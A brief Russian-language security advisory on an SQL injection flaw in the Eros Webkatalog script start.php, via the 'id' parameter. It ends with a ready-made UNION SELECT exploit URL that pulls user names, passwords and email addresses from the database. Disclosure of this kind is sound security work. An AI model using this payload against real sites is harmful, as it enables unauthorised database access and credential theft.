Программа: Eros Webkatalog
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "id" сценарием start.php (когда "go"
установлен в "rubrik"). Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит:
www.site.com/webkatalog/start.php?go=rubrik&id=-1+union+select+1,2,3,4,
5,6,7,8,9,concat(id,0x3a,vorname,0x3a,passwort,0x3,mail),11,12,13,14,15
